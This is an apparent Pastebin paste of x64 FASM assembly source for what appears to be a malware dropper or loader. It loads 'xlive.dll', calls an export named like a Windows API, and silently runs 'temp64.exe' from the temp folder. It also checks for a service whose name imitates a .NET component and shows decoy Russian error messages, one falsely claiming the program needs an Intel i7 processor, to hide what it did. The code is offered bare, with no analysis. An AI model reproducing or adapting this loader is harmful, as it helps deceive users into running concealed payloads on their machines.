Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- format PE64 GUI 5.0
- entry Main
- include 'win64a.inc'
- section '.data' data readable writeable
- szServiceName db "clr_optimization_v2.0.5066_32",0
- DllnotFound db "Dll xlive.dll not found.",0
- Alert db "Программу необходимо запустить от имени Aдминистратора.",0
- Fake db "Программа предназначена для выполнения на процессорах Intel i7 и выше.",0
- dllname db "xlive.dll",0
- maindll db "CreateFile",0
- exename db "temp64.exe",0
- schSCManager dq ?
- hLib dq ?
- temp db 260 dup (?)
- section '.code' code readable executable
- proc Main
- invoke LoadLibraryA,dllname
- cmp rax,0
- je .dllnotfound
- mov [hLib],rax
- invoke GetProcAddress,rax,maindll
- call rax
- invoke FreeLibrary,hLib
- invoke GetTempPathA,260,temp
- invoke lstrcatA,temp,exename
- invoke ShellExecuteA,0,0,temp,0,0,0
- invoke OpenSCManagerA,0,0,0F003Fh
- mov [schSCManager],rax
- invoke OpenServiceA,schSCManager,szServiceName,10000h
- mov [schSCManager],rax
- cmp rax,0
- jz .exit
- invoke CloseServiceHandle,schSCManager
- invoke MessageBoxA,0,Fake,0,30h
- invoke ExitProcess,rax
- .dllnotfound:
- invoke MessageBoxA,0,DllnotFound,0,10h
- invoke ExitProcess,rax
- .exit:
- invoke CloseServiceHandle,schSCManager
- invoke MessageBoxA,0,Alert,0,30h
- invoke ExitProcess,rax
- endp
- section '.idata' import data readable
- library kernel,'KERNEL32.DLL',\
- user,'USER32.DLL',\
- shell,'SHELL32.DLL',\
- advapi,'ADVAPI32.DLL'
- import advapi,\
- OpenSCManagerA,'OpenSCManagerA',\
- OpenServiceA,'OpenServiceA',\
- CloseServiceHandle,'CloseServiceHandle'
- import kernel,\
- ExitProcess,'ExitProcess',\
- GetTempPathA,'GetTempPathA',\
- lstrcatA,'lstrcatA',\
- LoadLibraryA,'LoadLibraryA',\
- GetProcAddress,'GetProcAddress',\
- FreeLibrary,'FreeLibrary'
- import shell,\
- ShellExecuteA,'ShellExecuteA'
- import user,\
- MessageBoxA,'MessageBoxA'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
